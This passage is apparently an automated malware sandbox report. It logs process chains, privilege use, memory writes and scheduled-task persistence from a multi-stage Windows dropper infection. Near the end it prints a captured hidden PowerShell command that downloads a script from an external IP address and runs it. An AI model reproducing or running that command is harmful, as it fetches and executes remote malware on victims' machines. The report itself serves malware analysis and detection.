N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\ProgramData\rjbum\abfjdu.exe N/A
N/A N/A C:\ProgramData\rjbum\abfjdu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2816 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2816 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2816 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2816 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4960 wrote to memory of 3928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4960 wrote to memory of 3928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3928 wrote to memory of 372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3996 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2320 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 372 wrote to memory of 4960 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 372 wrote to memory of 4960 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3928 wrote to memory of 3380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3996 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2164 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe

"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"

C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe

"C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

